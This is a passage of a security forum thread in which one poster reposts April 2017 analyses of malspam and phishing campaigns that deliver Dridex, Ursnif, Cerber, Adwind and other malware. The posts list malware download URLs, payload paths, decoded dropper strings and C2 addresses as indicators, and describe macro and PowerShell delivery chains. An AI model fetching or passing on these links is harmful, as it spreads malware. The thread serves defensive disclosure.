Jump to content


Photo

SPAM frauds, fakes, and other MALWARE deliveries...


  • Please log in to reply
2041 replies to this topic

#1901 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 04 April 2017 - 04:43 AM

FYI...

Fake 'Contract' SPAM - delivers trojan
- https://myonlinesecu...vering-malware/
4 Apr 2017 - "... malspam emails with password protected word doc attachments. They come with various subjects and themes, but they all contain -genuine- information about the recipient. Some like this one, only have the recipients full Name, Address and email address but some also contain genuine phone numbers, either landline or mobile numbers. An email with the subject of '[recipients name] Contract EFKP030417GD' pretending to come from random senders with a malicious word doc attachment...

Screenshot: https://myonlinesecu...FKP030417GD.png

victim.EFKP030417GD.doc - eventually downloads Ursnif (virustotal 10/60*) see VT comments for full details...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://virustotal.c...sis/1491230132/
03EF8.exe

Ursnif: http://researchcente...rks-identified/
"... banking Trojan..."
___

Fake 'DHL Delivery' SPAM - delivers js malware
- https://myonlinesecu...livers-malware/
4 Apr 2017 - "... an email with the subject of 'DHL Delivery' coming or pretending to come from DHL Express UK. These do look very realistic and if you are expecting a delivery today (many recipients will be) you can be very easily fooled by it... from the various reports are connections to various well known websites and webmail services like Google, Facebook, Yahoo, Nirsoft .com and what looks like attempted logins. The javascript file is basically -obfuscated- by simple reversing the url strings embedded in the file, so for example these reverse encoded strings embedded in the js file...
/6863daolnwod/se.aicnelapnerarpmoc//:ptth
/7184daolnwod/moc.leuftnuocsidupe//:ptth
/4372daolnwod/moc.puorgcmc//:ptth
/4819daolnwod/ku.oc.nimdagcc.www//:ptth
/8522daolnwod/xm.moc.zenitramoderfla.www//:ptth
Transform to:
http ://www .alfredomartinez .com.mx/download2258/ : 162.144.80.161: https://www.virustot...61/information/
> https://www.virustot...67052/analysis/
http ://www .ccgadmin .co.uk/download9184/ : 193.238.80.70: https://www.virustot...70/information/
> https://www.virustot...15435/analysis/
http ://cmcgroup .com/download2734/ : 216.218.207.100: https://www.virustot...00/information/
> https://www.virustot...0798c/analysis/
http ://epudiscountfuel .com/download4817/ : 69.175.87.139: https://www.virustot...39/information/
> https://www.virustot...38783/analysis/
http ://comprarenpalencia .es/download3686/ : 149.202.107.130: https://www.virustot...30/information/
> https://www.virustot...dd5f9/analysis/
...

Screenshot: https://myonlinesecu...lspam-email.png

The link in the email goes to http ://atvicon .com/OXF31666g/ where you see an open directory. Selecting index.php gives you the download of the .js file (VirusTotal 12/56*). The payload Security report** of this .js file shows lots of other urls associated with this malware & downloads, some of which give an immediate download of the .js file. The Payload Security report shows a download of a file named 2tlj63ijo.exe (VirusTotal 28/61***) (Payload Security[4]) ... my -manual- download gave me (VirusTotal 8/62[5]) Payload Security[6] ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491300071/
DHL__Report__5238760711__Di__April__04__2017.js

** https://www.hybrid-a...e01b38374bbcce7
Contacted Hosts
216.218.207.100
87.106.105.76
67.205.128.122


*** https://www.virustot...76f92/analysis/
2tlj63ijo.exe

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
87.106.105.76
67.205.128.122


5] https://www.virustot...sis/1491300282/
5960.exe

6] https://www.hybrid-a...vironmentId=100
Contacted Hosts
87.106.105.76
67.205.128.122


atvicon .com: 67.222.136.31: https://www.virustot...31/information/
___

Fake 'Western Union' SPAM - delivers java adwind
- https://myonlinesecu...rs-java-adwind/
4 Apr 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments... Unlike today’s slightly earlier Java Adwind malspam spoofing Bank of Bahamas*, this one does have a new Java Adwind version at the end of the complicated delivery chain...
* https://myonlinesecu...rs-java-adwind/

Screenshot: https://myonlinesecu...on-1_4_2017.png

These contain a genuine PDF that has a link to the site to download a zip file. First the pdf looks like:
> https://myonlinesecu...mtcn_wu_pdf.png
The link today goes to:
   http ://publikasi-fbio .ukdw .ac.id/css/WesternUnion_Fund_Verification_As_of_1st_April_2017.htm
where you see this page with instructions trying to make you think it is genuine with yet -another- download link:

   http ://publikasi-fbio .ukdw .ac.id/css/WesternUnion_Fund_Verification_As_of_1st_April_2017.zip

> https://myonlinesecu...ownloadpage.png

AWD020025 MTCN 25 Funds Verification.jar (478kb) Current Virus total detections 11/58*: MALWR**
details.jar (119kb) Current Virus total detections 5/55***: Payload Security[4]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491283408/
AWD020025 MTCN 25 Funds Verification.jar

** https://malwr.com/an...DQwYmE2NTFiOGU/

*** https://www.virustot...sis/1476250143/

4] https://www.hybrid-a...vironmentId=100

publikasi-fbio .ukdw .ac.id: 119.235.252.122: https://www.virustot...22/information/
> https://www.virustot...1f960/analysis/
___

'Quota Exceeded' - Phish
- https://myonlinesecu...d-now-phishing/
4 Apr 2017 - "... phishing attempts for email credentials...:

Screenshot: https://myonlinesecu...ase-Add-Now.png

If you follow the -link- inside-the-email you see a webpage looking like this:
  http ://maharajasweet .com/flash/bestdomain/?email=victim@domain.com :
> https://myonlinesecu...bmail_phish.png

... recognize familiar details like our email address or domain name... look at the -real- address in the URL bar at the top of the page:
> https://myonlinesecu...mail_phish2.png
After you input your email address and password, you get a 'success' page:
> https://myonlinesecu.../04/success.png

... whether it is a straight forward attempt, like this one, to -steal- your personal, bank, credit card or email and social networking log in details... the final IP address outside of your network in the Received: fields can be trusted as others can be -spoofed- ..."

maharajasweet .com: 209.200.238.28: https://www.virustot...28/information/
> https://www.virustot...05373/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 04 April 2017 - 09:06 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1902 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 06 April 2017 - 03:29 PM

FYI...

Malvertising on iOS - VPN app
- https://blog.malware...aising-vpn-app/
April 6, 2017 - "... we discovered this -scareware- campaign that pushes a ‘free’ VPN app called 'My Mobile Secure' to iOS users via rogue ads on popular Torrent sites. The page plays an ear-piercing beeping sound and claims your device is 'infected with viruses':
> https://blog.malware.../scareware_.png
... Apple has released an update to their mobile operating system (iOS 10.3.1*) to avoid so-called “browser lockers” via incessant JavaScript popups that prevented users from closing the offending page. Having said that, social engineering attacks such as the one above are still active and prey on the surprise effect or culpability someone may experience after browsing sites with pirated material:
* https://support.apple.com/HT207688
... According to their website, MobileXpression is a market research panel designed to 'understand the trends and behaviors of people using the mobile Internet'. This seems a bit peculiar when applied to a VPN product, whose goal is to precisely anonymize your online activity by encrypting your data from your ISP, government, bad guys, etc... Free does not mean Open Source or risk-free for that matter. But the fact of the matter is that people tend to gravitate towards free products, especially if those are pushed aggressively via hungry advertisers. For this reason, users should pay even more attention before installing a free app:
> https://blog.malware...04/privacy1.png
... data should never be collected in the first place because some very unfortunate things can happen once it is logged in a database. Haven’t there been enough data breaches lately to be seriously concerned with what kind of data a company may collect (inadvertently or not)? Choosing the right VPN application these days has become very challenging due to the renewed interest in online privacy (there are other reasons people buy VPNs as well, such as to bypass geo-restrictions from services like Netflix, the BBC, etc). It’s important to take the time to review the companies behind those products, their policies, and real reviews, not -fake- or sponsored ones. At the end of the day, you are placing your data and trust in someone else’s hands.
Kudos to CloudFlare for terminating the scareware domain in less than five minutes.
IOCs:
onclkds .com: 206.54.163.50
xml.admetix .com: 173.239.53.20
clk1005 .com: 173.192.117.80
inclk .com: 108.168.157.87
browserloading .com: 52.3.189.94
52.21.139.228
52.4.167.240

giveawaywins .com: 104.31.67.144
104.31.66.144

securecheckapp .com: 192.64.119.233

206.54.163.50: https://www.virustot...50/information/
> https://www.virustot...d21a9/analysis/
173.239.53.20: https://www.virustot...20/information/
> https://www.virustot...d9603/analysis/
173.192.117.80: https://www.virustot...80/information/<<<
108.168.157.87: https://www.virustot...87/information/
> https://www.virustot...f3683/analysis/
52.29.11.13: https://www.virustot...13/information/<<<
104.31.67.144: https://www.virustot...44/information/<<<
104.28.17.3: https://www.virustot....3/information/<<<
192.64.119.233: https://www.virustot...33/information/<<<
..."
 

:ninja: :ninja:   :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1903 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 07 April 2017 - 05:26 AM

FYI...

Fake 'Customer Statement' SPAM - deliverers malware
- https://myonlinesecu...verers-malware/
7 Apr 2017 - "An email with the subject of  pretending to come from random companies with a zip file that extracts to another zip that eventually extracts to a malicious word doc attachment delivers malware  probably Dridex banking Trojan. Currently Payload Security has a massive backlog so analysis is pending...

Screenshot: https://myonlinesecu...r-statement.png

Statement_SE8743.docm - Current Virus total detections 8/58* MALWR**...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491553437/

** https://malwr.com/an...zc3MTg1MGM4NjQ/
Hosts
195.114.1.135
___

Fake '.JPG' SPAM - delivers Dridex
- https://myonlinesecu...elivers-dridex/
7 Apr 2017 - "... an email with a subject saying something like 'Emailing: PIC9744891.JPG' (random numbers and file extensions... Gif, JPG, Tiff, Png or any other image or doc file extension). They all come from random senders. The zip attachment extracts to another zip file that eventually extracts to the VBS dropper...

Screenshot: https://myonlinesecu...dex-malspam.png

PIC9390310.vbs - Current Virus total detections 5/56* - MALWR** shows a download of an encrypted file from
  http ://staciedunlop .com/87hcwc? which is converted by the script to KhtLPsv.exe (VirusTotal 14/61***)
Each VBS file has 4-or-5 embedded urls that download the encrypted text file that gets converted to the Dridex payload... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491567450/

** https://malwr.com/an...zRjNjhmYTJlOWQ/
Hosts
64.69.93.68

*** https://www.virustot...sis/1491568169/

staciedunlop .com: 64.69.93.68: https://www.virustot...68/information/
> https://www.virustot...3af59/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 07 April 2017 - 10:38 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1904 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 April 2017 - 11:29 AM

FYI...

'Paypal Update acct info' – Phish
- https://myonlinesecu...h-a-difference/
8 Apr 2017 - "We see lots of phishing attempts for PayPal details. This one is slightly different than many others and much more involved and complicated. This one has an html -attachment- that contains the phishing acts... They ask you to give all the usual details... The whole HTML file is -encrypted- ...
Update: ... by numerous contacts on Twitter, eventually it has been discovered that

   http ://www.accunetix .net/80f78664.php  is the phishing drop site...

Screenshot: https://myonlinesecu...information.png

The html form looks like this (reduced in size to fit on one screenshot):
> https://myonlinesecu...-atatchment.png

...  Watch for -any- site that invites you to enter ANY personal or financial information..."

accunetix .net: 94.102.60.170: https://www.virustot...70/information/
> https://www.virustot...6c62d/analysis/
 

:ninja: :ninja:   :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1905 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 10 April 2017 - 04:24 AM

FYI...

Fake 'Scanned image' SPAM - delivers Cerber
- https://myonlinesecu...ber-ransomware/
10 Apr 2017 - "... An email with the subject of 'Scanned image from MX-2600N' pretending to come from noreply@  your own email address with a zip file attachment that extracts to another zip file then a malicious word doc delivers Cerber ransomware...

Screenshot: https://myonlinesecu...om-MX-2600N.png

20170410_294152.docm - Current Virus total detections 11/58*: Payload Security** shows a download of an encrypted txt file from http ://villa-kunterbunt-geseke .de/nkjv78v which is transformed by the macro script to redchip2.exe (VirusTotal 8/61***). Payload Security[4]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491816739/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
85.114.146.10

*** https://www.virustot...sis/1491816149/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17

villa-kunterbunt-geseke .de: 85.114.146.10: https://www.virustot...10/information/
> https://www.virustot...1ec24/analysis/
___

Fake 'scan data' SPAM - delivers Dridex
- https://myonlinesecu...eliver-malware/
10 Apr 2017 - "... an email with the subject of 'scan data' pretending to come from noreply@ your own email address...

Screenshot: https://myonlinesecu...ata-malspam.png

... several antiviruses on VirusTotal 8/56* declare this as 'a malicious PDF file'. PDF examiner** declares this 'a suspicious.embedded doc file' and 'suspicious.warning: object contains JavaScript' | Payload Security***...

ScanData155328.docm (VirusTotal 10/57[4]) (Payload Security [5]) | MALWR[6]. This contacts:
 super-marv .com/874hv... It looks like it should download an -encrypted- txt file that is converted to redchip2.exe... Update: this one is Dridex... An alternative pdf gave me Payload Security[7] which downloaded redchip2.exe from

 hiddencreek .comcastbiz .net/874hv (Virustotal 10/61[8])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491827466/
[See 'File detail']

** https://www.malwaret...2bfa06d241b8f27

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17
143.95.251.11


4] https://www.virustot...sis/1491829510/
ScanData155328.docm

5] https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17
143.95.251.11


6] https://malwr.com/su...jU3NWQxMmRhM2Q/
Hosts
143.95.251.11

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17
216.87.186.165
185.44.105.92
64.79.205.100
185.25.184.214


8] https://www.virustot...sis/1491828872/
redchip2.exe

hiddencreek .comcastbiz .net: 216.87.186.165: https://www.virustot...65/information/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 10 April 2017 - 10:03 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1906 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 11 April 2017 - 05:53 AM

FYI...

Fake 'RBS' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
11 Apr 2017 - "An email with the subject of 'FW: Important BACs documents' pretending to come from RBS BACs <GRGBACspaymentsdelivery@ rbsdocuments .co.uk> with a malicious word doc spreadsheet attachment delivers malware... it appears to be Trickbot banking Trojan...

Screenshot: https://myonlinesecu...04/rbs_bacs.png

RBS_BACs_11042017.doc - Current Virus total detections 3/54*. Payload Security currently is not responding for me.  MALWR** shows nothing relevant.
I am informed that it uses PowerShell to download  http ://hitecmetal .com.my/images/NGVN4LNyaCV6amPf8jsgJeHVgLX.png  which of course is -not- a png but a renamed .exe file (VirusTotal 11/60***) which even more suggests ursnif or Trickbot banking Trojans... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491904361/

** https://malwr.com/an...DQ0MzZhMjVhNTQ/

*** https://www.virustot...sis/1491905198/
kxecz.exe

hitecmetal .com.my: 110.4.45.192: https://www.virustot...92/information/
___

Fake 'scanned file' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
11 Apr 2017 - "... an email that has a multitude of subjects all along the line of 'scanned file/image document/image etc. pretending to come from totally random senders with a pdf attachment. This PDF does have an embedded word doc inside... Payload Security Hybrid Analysis... is currently down. I assume this will turn out to be Dridex in the same way it did yesterday*...
* https://myonlinesecu...eliver-malware/

Screenshot: https://myonlinesecu.../image-data.png

20170411414556.pdf - Current Virus total detections 10/57*. MALWR**...
Update: ... the word macro content shows downloads of -encrypted- txt files from:
medjobsmatch .com/kjv783r
outoftheboxpc .org/kjv783r
jenya.kossoy .com/kjv783r
Which MALWR*** managed to decode as redchip2.exe (VirusTotal 8/61[4]) which although not being detected as Dridex is either likely to be Dridex or Kegotip... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491908876/

** https://malwr.com/an...jJlMjg1NmQ4Yjg/

*** https://malwr.com/an...jk1ZmM5MGZmZmU/
Hosts
23.229.143.7

4] https://www.virustot...sis/1491910444/

medjobsmatch .com: 23.229.143.7: https://www.virustot....7/information/

outoftheboxpc .org: 216.87.186.17: https://www.virustot...17/information/

jenya.kossoy .com: 64.111.126.118: https://www.virustot...18/information/
___

Fake Google Maps listings redirect Users to fraudulent sites
- https://www.bleeping...tes-each-month/
Apr 10, 2017 - "... This is the result of a study carried out by Google and University of California, San Diego researchers, who analyzed over 100,000 businesses marked as 'abusive' and added to Google Maps between June 2014 and September 2015. Researchers say that 74% of these abusive listings were for local businesses in the US and India, mainly in pockets around certain local hotspots, especially in large metropolitan areas such as New York, Chicago, Houston, or Los Angeles. In most cases, the scheme was simple. A customer in need of a locksmith or electrician would search Google Maps for a local company. If he navigated to the website of a fake business or called its number, a call center operator posing as the business' representative would send over an unaccredited contractor that would charge much more than regular professionals. If a customer's situation were urgent, the contractor would often charge more than the initial agreed upon price. Researchers said that 40.3% of all the listings for fake companies they found focused on on-call services, such as locksmiths, plumbers, and electricians, were customers were desperate to resolve issues... To list a business card on Google Maps, companies must go through a series of checks that involves Google mailing a postal card, or making a phone call to the business headquarters. After analyzing over 100,000 fake listings, researchers said miscreants registered post office boxes at UPS stores and used the same address to register tens to hundreds of listings per address. They did the same thing for their phone contact, by buying cheap VoIP numbers from providers such as Bandwidth .com, Level 3, Twilio, or Ring Central... The research team discovered that crooks managed to hijack 0.5% of Google Maps' outbound traffic for the studied period... Google also says it currently detects and disables around 85% fake listings before they ever appear on Google Maps..."
> https://static.googl...chive/45976.pdf
[ 9 pages ]
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 11 April 2017 - 09:10 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1907 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 12 April 2017 - 05:19 AM

FYI...

Fake 'resume' SPAM - delivers malware
- https://myonlinesecu...ads-to-malware/
12 Apr 2017 - "An email with the subject of 'Greetings' come from a random name and email address that says it is a resume applying for employment with a malicious word doc attachment delivers malware... Update: I am very reliably informed this is a Zyklon HTTP bot* which is being used in DDOS attacks against a wide variety of sites and is a password and other credential stealer, including all windows, office and many other software licencing keys, as well as email credentials, website passwords and any other password that you can think of...
* https://security.rad...on-http-botnet/

Screenshot: https://myonlinesecu...arah-resume.png

Sarah-Resume.doc - Current Virus total detections 7/57**. Payload Security*** shows a download using PowerShell from

 http ://185.165.29.36 /11.mov which is -renamed- by the macro to k4208.exe
(VirusTotal 7/61[4]) (Payload Security[5]) and autorun and in turn drops iTunes.exe and autorun
(VirusTotal 5/61[6]) (Payload Security[7])... The word doc has a slightly different instruction message than we usually see:
> https://myonlinesecu...tent-locked.png
This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run -will- infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
** https://www.virustot...sis/1491973686/

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.165.29.36
78.47.139.102
76.73.17.194
154.35.32.5
86.59.21.38
194.109.206.212
84.146.168.11
91.121.230.210
185.66.250.141
192.87.28.82
163.172.29.21
178.162.194.82
130.230.113.235


4] https://www.virustot...sis/1491963473/

5] https://www.hybrid-a...vironmentId=100
Contacted Hosts (20)

6] https://www.virustot...sis/1491963495/

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts (13)
___

Ransomware variants - emails
- https://isc.sans.edu...l?storyid=22290
2017-04-12 - "... malicious spam (malspam) on Tuesday morning 2017-04-11. At first, I thought it had limited distribution. Later I found several other examples, and they were distributing yet another ransomware variant... The ransomware is very aware of its environment, and I had use a physical Windows host to see the infection activity...:
> https://isc.sans.edu...ry-image-01.jpg
... I collected 14 samples of the malspam on Tuesday 2017-04-11. It started as early as 14:12 UTC and continued through at least 17:03 UTC. Each email had a -different- subject line, a -different- sender, -different- message text, and a -different-link- to click:
> https://isc.sans.edu...ry-image-02.jpg
... -All- are subdomains of ideliverys .com on 47.91.88.133 port 80. The domain ideliverys .com was registered the-day-before on Monday 2017-04-10...
As usual, humans are the weakest link in this type of infection chain. If people are determined to bypass all warnings, and their systems are configured to allow it, they will become infected. Unfortunately, that's too often the case. I don't believe the situation will improve any time soon, so we can expect these types of malspam campaigns to continue..."
(More detail at the first ISC URL at the top.)

ideliverys .com: 47.91.88.133: https://www.virustot...33/information/
> https://www.virustot...f9d0f/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 12 April 2017 - 06:21 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1908 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 13 April 2017 - 04:07 AM

FYI...

Fake 'USPS, UPS, DHL, FEDEX' SPAM - delivers mole ransomware
- https://myonlinesecu...ole-ransomware/
12 Apr 2017 - "... USPS, UPS, DHL, FEDEX and all the other delivery companies being spoofed and emails pretending to be from them delivering all sorts of malware, usually via zip attachments containing JavaScript files. I saw this post on Sans Security blog*... and expected that I would soon see them...they started to flood in today.
* https://isc.sans.edu...l?storyid=22290
There are a multitude of different subjects. Some of then ones I received today are:
'    Official notice regarding your order
    IMPORTANT USPS MONEYBACK INFO IN REGARDS TO YOUR PARCEL
    AUTOMATED notice in regards to your parcel’s status
    WARNING: INFO ABOUT A LATEST REFUND '

These subjects today are different to the unusual subjects we see listed in the sans blog post.
Typical senders -imitating- USPS include:
    USPS Delivery <huo4@ doverealty .net>
    USPS Express Delivery <ooyyomq57575452@ avensonline .org>
    USPS Priority Parcels <rejunwuj75324281@ vki-interiors .com>
    USPS Ground Support <heyluogf13136286@ parcerianet .com.br> ...
... these -all- use various subdomains of ideliverys .com... you see what looks like a word online website and you are invited to download then latest 'plugin' version to read the documents online:
> https://myonlinesecu...line-plugin.png

plugin.exe - Current Virus total detections 29/60**. Payload Security***.. I assume this is the same mole ransomware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
** https://www.virustot...47b11/analysis/

*** https://www.hybrid-a...vironmentId=100

ideliverys .com: 47.91.88.133: https://www.virustot...33/information/
> https://www.virustot...f9d0f/analysis/

- https://myonlinesecu...vering-malware/
13 Apr 2017 - "... USPS, UPS, DHL, FEDEX SPAM... a -hybrid- campaign mixing elements of all the previous campaigns...

Screenshot: https://myonlinesecu...REFUND-INFO.png

... These all use various subdomains of maildeliverys .com to divert to
 http ://tramplinonline .ru/counter/1.htm  where you see what looks like a word online website and you are invited to download then -latest- 'plugin' version to read the documents online:
> https://myonlinesecu..._trampoline.png
... this is where the hybrid element comes into play. Once you press download, you get a zip file plugin.zip which extracts to plugin.js ... starts with the first site in the array (var ll) and then downloads these (if the first site cannot be contacted or the file is missing) it moves on to next site and so on, eventually giving -3- malware files.
/counter/exe1.exe (mole ransomware) VirusTotal 6/62[1]
/counter/exe2.exe  delivers kovter/powerliks VirusTotal 7/62[2]
/counter/exe3.exe  VirusTotal 0/61[3] | VirusTotal 3/62[4] (first one possibly corrupt)
Today’s sites are:
forum-turism .org.ro/images/layout
boorsemsport .be/templates/yoo_aurora/less/uikit
eurostandard .ro/pics/size1
alita .kz/tmp/installation/language/cs-CZ
sportbelijning .be/libraries/joomla/application/web
tramplinonline .ru
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1492102514/

2] https://www.virustot...sis/1492110707/

3] https://www.virustot...sis/1492110713/

4] https://www.virustot...sis/1492109005/

maildeliverys .com: 47.91.88.133: https://www.virustot...33/information/
> https://www.virustot...6b637/analysis/

tramplinonline .ru: 92.242.42.146: https://www.virustot...46/information/
> https://www.virustot...f991e/analysis/
___

Kelihos.E Botnet – Takedown
- http://blog.shadowse...4/12/kelihos-e/
April 12, 2017 - "On Monday April 10th 2017, The US Department of Justice (DOJ) announced* a successful operation to take down the Kelihos Botnet and arrest the suspected botnet operator. The Kelihos botnet (and its predecessor Waledec) was one of the most active spamming botnets. Earlier versions of the malware were also involved in delivering trojan horses, stealing user credentials and crypto currency wallets, and in crypto currency mining. The Kelihos botnet was made up of a network of tens of thousands of infected Windows hosts worldwide. It used its own peer-to-peer (P2P) protocol, along with backup DNS domains, to provide resilient command and control (C2) facilities... The Kelihos.E botnet takedown occurred on Friday April 8th 2017, with 100% of the peer-to-peer network being successfully taken over by law enforcement and C2 traffic redirected to our sinkholes, C2 backend server infrastructure being seized/disrupted, as well as multiple fallback DNS domains being successfully sinkholed under US court order..."
* https://www.justice....elihos-botnet-0
April 10, 2017 - "The Justice Department today announced an extensive effort to disrupt and dismantle the Kelihos botnet – a global network of tens of thousands of infected computers under the control of a cybercriminal that was used to facilitate malicious activities including harvesting login credentials, distributing hundreds of millions of spam e-mails, and installing ransomware and other malicious software..."
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 13 April 2017 - 03:56 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1909 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 14 April 2017 - 05:12 AM

FYI...

Fake 'MONEY GRAM' SPAM - delivers java adwind
- https://myonlinesecu...rs-java-adwind/
14 Apr 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments... Slight change to previous examples today where these are being addressed to tamuna.khaduri@ basisbank .ge or mdzirkvelishvili@ tbcbank .com.ge ... looks like random names @ random bank.ge  and BCC to the actual recipient... coming via compromised accounts on Godaddy...

Screenshot: https://myonlinesecu...ONFIRMATION.png

URGENT MONEYGRAM CONFIRMATION.jar (479kb) - Current Virus total detections 19/59*. MALWR** ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1492148381/

** https://malwr.com/an...WMyNTc3NGYyYTI/
 

:ninja: :ninja:   :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1910 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 15 April 2017 - 09:33 AM

FYI...

DropBox – Phish
- https://myonlinesecu...opbox-phishing/
15 Apr 2017 - "... phishing attempts for email credentials...

Screenshot: https://myonlinesecu...phish-email.png

If you follow the -link- you see a webpage looking like this:
 http ://magioangeles .com/mo/DropBoxPhoto/
> https://myonlinesecu...opbox-phish.png

Select -any- of the email services and you get:
> https://myonlinesecu...pbox-phish1.png

Then you get sent to a signup page on the genuine dropbox site..."

magioangeles .com: 209.133.208.250: https://www.virustot...50/information/
> https://www.virustot...deda0/analysis/
 

:ninja: :ninja:   :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1911 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 16 April 2017 - 09:18 AM

FYI...

Fake 'order proforma invoice' SPAM - delivers 'RAT'
- https://myonlinesecu...ity-link-r-a-t/
16 Apr 2017 - "... -fake- 'Request for 1st new order proforma invoice' -scam- delivers luminosity link Remote Access Tool Trojan* which is being heavily misused...
* http://researchcente...-configuration/

Screenshot: https://myonlinesecu...rma-invoice.png

... The -link-in-the-email-body- goes to
 http ://bit .ly/2oWFVzK which directs to
 http ://www .internationalconfirmation .com/re-direct-live.php which downloads the malware from
 http ://redbulconfirm .host/LIST%20OF%20ORDERS%20FOR%20PROFORMA%20INVOICE .JPG .com...

LIST OF ORDERS FOR PROFORMA INVOICE.JPG .com - Current Virus total detections 16/60*. Payload Security** which is describing it as luminosity link Trojan... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustot...sis/1492341398/

** https://www.reverse....vironmentId=100
Contacted Hosts
192.166.218.230

internationalconfirmation .com: 69.65.33.119: https://www.virustot...19/information/

redbulconfirm .host: 68.65.122.167: https://www.virustot...67/information/
 

:ninja: :ninja:    :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1912 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 17 April 2017 - 06:54 AM

FYI...

Fake 'ftc refund' SPAM - leads to malware
- http://blog.dynamoo....ftc-refund.html
17 Apr 2017 - "This -fake- FTC email leads to malware. Curiously, it was sent to a company that received a multimillion dollar FTC -fine- but this is almost definitely a coincidence:
From:    Federal Trade Commission [secretary@ ftccomplaintassistant .com]
Date:    17 April 2017 at 15:25
Subject:    RE: RE: ftc refund
It seems we can claim a refund from the FTC.
Check this out and give me a call.
https ://www .ftc .gov/refunds/company/companyname.com/FTC_refund_recipientname.doc
Thank you
James Newman
Senior Accountant
